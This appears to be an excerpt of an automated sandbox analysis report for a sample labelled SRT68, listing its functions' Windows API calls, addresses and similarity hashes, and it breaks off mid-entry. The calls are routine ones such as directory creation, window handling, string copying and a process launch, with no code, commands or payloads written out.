                                                                      Similarity
                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 1463438336-0
                                                                      • Opcode ID: 11c8a45c3219f50e2c4da7cc002fdf87a1cb62ca3a4c221035f356077795f919
                                                                      • Instruction ID: b2b22fbeb5c3166912632b1d052602e2bb07c7c17812065b83d4bccc10631744
                                                                      • Opcode Fuzzy Hash: 11c8a45c3219f50e2c4da7cc002fdf87a1cb62ca3a4c221035f356077795f919
                                                                      • Instruction Fuzzy Hash: 70219231200606BFEB269F74DC00FBABBF9FF48710F10401AFB9196654DB79941197A0
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,0102FAC0), ref: 01003A64
                                                                      • GetLastError.KERNEL32 ref: 01003A73
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 01003A82
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0102FAC0), ref: 01003ADF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      • Opcode ID: 6b74f7110fc17020b38423d83ebba1d4fde87ccba3d1043f35e7eb3688e1831a
                                                                      • Instruction ID: 26eae621515b8783b53977de38b428d11eca7d22e65b7aa99763aa7cb00bfd57
                                                                      • Opcode Fuzzy Hash: 6b74f7110fc17020b38423d83ebba1d4fde87ccba3d1043f35e7eb3688e1831a
                                                                      • Instruction Fuzzy Hash: 2F2171745082029F9712EF28C88186B7BE4BE5B764F104A5EF4D9CB2D1DB31D949CB92
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 01025D80
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01025D9A
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01025DA8
                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01025DB6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$AttributesLayered
                                                                      • String ID:
                                                                      • API String ID: 2169480361-0
                                                                      • Opcode ID: 2b847fb8da10c75cc1031ca5c3ae4fdead74065719449a0d9da7797b4666b92e
                                                                      • Instruction ID: 50c987423a52976d7fda6dab83dd88afc5b29b65b8702b3ca92c5074ff85daa0
                                                                      • Opcode Fuzzy Hash: 2b847fb8da10c75cc1031ca5c3ae4fdead74065719449a0d9da7797b4666b92e
                                                                      • Instruction Fuzzy Hash: D811D631205121AFDB24AF14DC08FBF77A9EF86360F144218F956D72E2C7A8AD01C754
                                                                      APIs
                                                                        • Part of subcall function 00FFF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FFDCD3,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?), ref: 00FFF0CB
                                                                        • Part of subcall function 00FFF0BC: lstrcpyW.KERNEL32(00000000,?,?,00FFDCD3,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFF0F1
                                                                        • Part of subcall function 00FFF0BC: lstrcmpiW.KERNEL32(00000000,?,00FFDCD3,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?), ref: 00FFF122
                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFDCEC
                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFDD12
                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFDD46
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                      • String ID: cdecl
                                                                      • API String ID: 4031866154-3896280584
                                                                      • Opcode ID: a4421dc029e54915ab207ebe1fa34e53c1d37fcfa441a4ad70e43d94c9065fa2
                                                                      • Instruction ID: 19aa0581980c7020100804d8809b487f170e22db0ad8a8b845f7943b10c152e3
                                                                      • Opcode Fuzzy Hash: a4421dc029e54915ab207ebe1fa34e53c1d37fcfa441a4ad70e43d94c9065fa2
                                                                      • Instruction Fuzzy Hash: 9C11B13A200309EBCB259F34C845D7E77A9FF45350B50802AFA06CB260EB759841E790
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00FD5101
                                                                        • Part of subcall function 00FC571C: __FF_MSGBANNER.LIBCMT ref: 00FC5733
                                                                        • Part of subcall function 00FC571C: __NMSG_WRITE.LIBCMT ref: 00FC573A
                                                                        • Part of subcall function 00FC571C: RtlAllocateHeap.NTDLL(01570000,00000000,00000001,00000000,?,?,?,00FC0DD3,?), ref: 00FC575F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_free
                                                                      • String ID:
                                                                      • API String ID: 614378929-0
                                                                      • Opcode ID: 476683930c519bff05b60b3ad96e150aa029fed8ac33395a68b6c873c27281cc
                                                                      • Instruction ID: 75d3cf9ee324b2ca358a8578228d250ac6f0e5ed84eb53fbec72c091d78692e2
                                                                      • Opcode Fuzzy Hash: 476683930c519bff05b60b3ad96e150aa029fed8ac33395a68b6c873c27281cc
                                                                      • Instruction Fuzzy Hash: BA11E772904A13AECB312F74AD06B5D37A9AF50BF1B24452FF9489A350DE398C41B790
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00FA44CF
                                                                        • Part of subcall function 00FA407C: _memset.LIBCMT ref: 00FA40FC
                                                                        • Part of subcall function 00FA407C: _wcscpy.LIBCMT ref: 00FA4150
                                                                        • Part of subcall function 00FA407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FA4160
                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00FA4524
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA4533
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FDD4B9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1378193009-0
                                                                      • Opcode ID: 2ba4dca891086ec79bcbf9e5779ec44627da12e0745e89aeba41fb8c3a3ffab5
                                                                      • Instruction ID: 091fb3bc2e1d8989a2c0b81ad2480b8eaf486d5a7907ea03025df4f5431b2048
                                                                      • Opcode Fuzzy Hash: 2ba4dca891086ec79bcbf9e5779ec44627da12e0745e89aeba41fb8c3a3ffab5
                                                                      • Instruction Fuzzy Hash: B021F8B5D043849FE732CB248855BE6BBECAB02318F18008EE6CE56241C7B53984E741
                                                                      APIs
                                                                        • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01007896,?,?,00000000), ref: 00FA5A2C
                                                                        • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01007896,?,?,00000000,?,?), ref: 00FA5A50
                                                                      • gethostbyname.WSOCK32(?,?,?), ref: 01016399
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 010163A4
                                                                      • _memmove.LIBCMT ref: 010163D1
                                                                      • inet_ntoa.WSOCK32(?), ref: 010163DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 1504782959-0
                                                                      • Opcode ID: 42c18067e9ce103dac91991ed1e74b0c269f72dddc329a728e61dae585d807b3
                                                                      • Instruction ID: b24b876de6b98964038d81bab4eaf4141f39a23612c10cf298408ae646200184
                                                                      • Opcode Fuzzy Hash: 42c18067e9ce103dac91991ed1e74b0c269f72dddc329a728e61dae585d807b3
                                                                      • Instruction Fuzzy Hash: EA115E7550010AAFCB00FFA4DD46DEFB7B8AF09310B144069F505A7161DF79AE04EB61
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FF8B61
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FF8B73
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FF8B89
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FF8BA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 8a3ea32cabcd3242f4ce41281c6056181bcb364ccf26dd66d48feaa85481fb4c
                                                                      • Instruction ID: 6d45098d878b07ce6bd70dfac0382362ce64a3cbe925a99571578835d9abc16c
                                                                      • Opcode Fuzzy Hash: 8a3ea32cabcd3242f4ce41281c6056181bcb364ccf26dd66d48feaa85481fb4c
                                                                      • Instruction Fuzzy Hash: 87110A79901218BFDB11DFA5C885FADBB74FF48750F204095EA00B7260DA716E11EB94
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 00FA12D8
                                                                      • GetClientRect.USER32(?,?), ref: 00FDB5FB
                                                                      • GetCursorPos.USER32(?), ref: 00FDB605
                                                                      • ScreenToClient.USER32(?,?), ref: 00FDB610
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 4127811313-0
                                                                      • Opcode ID: 10e3cbb6d98d87e72a916d56163fda3f55e99f3352b784c234a3cee04e3f19f7
                                                                      • Instruction ID: 106a220edd62adfea0cec918c504a2225776d3291cd241ba71644581aa704c0e
                                                                      • Opcode Fuzzy Hash: 10e3cbb6d98d87e72a916d56163fda3f55e99f3352b784c234a3cee04e3f19f7
                                                                      • Instruction Fuzzy Hash: 39110D75A0001AEFCB20DFA8D989AEE77F8FB0A341F510455F941E7240C735FA519BA5
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 0100115F
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 01001184
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 0100118E
                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 010011C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      • Opcode ID: 872be46037749ab4ebdd9e52f7f9e8299223b64ba47b578220d95ec7589f6f86
                                                                      • Instruction ID: ff3d50d47fbd63c11ac00ed91cd9f1bb9024568466fe35e16ec7e77389e50e1f
                                                                      • Opcode Fuzzy Hash: 872be46037749ab4ebdd9e52f7f9e8299223b64ba47b578220d95ec7589f6f86
                                                                      • Instruction Fuzzy Hash: 97115A31C0061DE7DF159FA4D848AEEBBB8FF09751F504045EA80B2281CB359550CBD1
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00FFD84D
                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FFD864
                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FFD879
                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00FFD897
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      • Opcode ID: d8679b6aad678bdb443a79253390f8a36f824a7d4b28ab3c4f767bcaf76bbc68
                                                                      • Instruction ID: 164ef2811ac4b4602b285760be0b24c0c5ca0cd64d35d4d1d661268855c29d4d
                                                                      • Opcode Fuzzy Hash: d8679b6aad678bdb443a79253390f8a36f824a7d4b28ab3c4f767bcaf76bbc68
                                                                      • Instruction Fuzzy Hash: 17115E75606309EBE3309F50D808FA6BBBDEF00B80F208569E656D6090D7B5E549EBA1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                      • Instruction ID: efab7856542bdcbc5f6ee6ad28e5b98e25f0904309f4939d9a23e7c2cf55c7e2
                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                      • Instruction Fuzzy Hash: 03014B7244824ABBCF166F84DC05CEE3F63BB18360B588456FA1858271E336D9B1BB81
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 0102B2E4
                                                                      • ScreenToClient.USER32(?,?), ref: 0102B2FC
                                                                      • ScreenToClient.USER32(?,?), ref: 0102B320
                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0102B33B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                      • String ID:
                                                                      • API String ID: 357397906-0
                                                                      • Opcode ID: c9c9bb13fcc33aa7b53f086be9616812d0af62e14802bfde2a44030cebfa26d8
                                                                      • Instruction ID: 40509005baa930f25b530997f7174a1419aa7a92fa66670fdb8510498bf5f0c6
                                                                      • Opcode Fuzzy Hash: c9c9bb13fcc33aa7b53f086be9616812d0af62e14802bfde2a44030cebfa26d8
                                                                      • Instruction Fuzzy Hash: 271144B9D0020AEFDB51DFA9C4849EEFBF9FF08210F108156E954E3614D735AA558F50
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0102B644
                                                                      • _memset.LIBCMT ref: 0102B653
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01066F20,01066F64), ref: 0102B682
                                                                      • CloseHandle.KERNEL32 ref: 0102B694
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                      • String ID:
                                                                      • API String ID: 3277943733-0
                                                                      • Opcode ID: db1ca7019ab2bc27b56d5e5734bf80dcdd2025432b7ebb2fbb70ac9c13b6162c
                                                                      • Instruction ID: 8e39ca2223a3c760753a1ede79492782288d192eeea404c32e31761efb1a2caf
                                                                      • Opcode Fuzzy Hash: db1ca7019ab2bc27b56d5e5734bf80dcdd2025432b7ebb2fbb70ac9c13b6162c
                                                                      • Instruction Fuzzy Hash: 1EF082B25403017BF2302B65AC16FBB3A9CEB18395F804020FA89E5196DBBB4C0097A8
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 01006BE6
                                                                        • Part of subcall function 010076C4: _memset.LIBCMT ref: 010076F9
                                                                      • _memmove.LIBCMT ref: 01006C09
                                                                      • _memset.LIBCMT ref: 01006C16
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 01006C26
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                      • String ID:
                                                                      • API String ID: 48991266-0
                                                                      • Opcode ID: 34c47665eb2da01d08444c15e6e9d2eff14a944577a814a55ecbd777f9ce368a
                                                                      • Instruction ID: 2d4629ed3d6a344022bf07ae58543245c1337d648528c46f04296a0d0bc13239
                                                                      • Opcode Fuzzy Hash: 34c47665eb2da01d08444c15e6e9d2eff14a944577a814a55ecbd777f9ce368a
                                                                      • Instruction Fuzzy Hash: 7AF0543A100101ABCF126F95DC85E8ABB29EF56360F04C055FE499E25ACB35E811DBB4
                                                                      APIs
                                                                        • Part of subcall function 00FA12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FA134D
                                                                        • Part of subcall function 00FA12F3: SelectObject.GDI32(?,00000000), ref: 00FA135C
                                                                        • Part of subcall function 00FA12F3: BeginPath.GDI32(?), ref: 00FA1373
                                                                        • Part of subcall function 00FA12F3: SelectObject.GDI32(?,00000000), ref: 00FA139C
                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0102BD40
                                                                      • LineTo.GDI32(00000000,?,?), ref: 0102BD4D
                                                                      • EndPath.GDI32(00000000), ref: 0102BD5D
                                                                      • StrokePath.GDI32(00000000), ref: 0102BD6B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 1539411459-0
                                                                      • Opcode ID: cec0c74a99aa5ab3ef592e11a780cb02e65d6de64edeecd47a240852acb05be1
                                                                      • Instruction ID: 841802188c55f453ebc0130276319a9f9a68f3bcaf3b550fe3cbc5f31240f156
                                                                      • Opcode Fuzzy Hash: cec0c74a99aa5ab3ef592e11a780cb02e65d6de64edeecd47a240852acb05be1
                                                                      • Instruction Fuzzy Hash: 29F0823100126ABBDB326F54AC09FCE3FA9AF06751F244140FA91610D58B7E5561DFA9
                                                                      APIs
                                                                      • GetSysColor.USER32(00000008), ref: 00FA2231
                                                                      • SetTextColor.GDI32(?,000000FF), ref: 00FA223B
                                                                      • SetBkMode.GDI32(?,00000001), ref: 00FA2250
                                                                      • GetStockObject.GDI32(00000005), ref: 00FA2258
                                                                      • GetWindowDC.USER32(?,00000000), ref: 00FDBE83
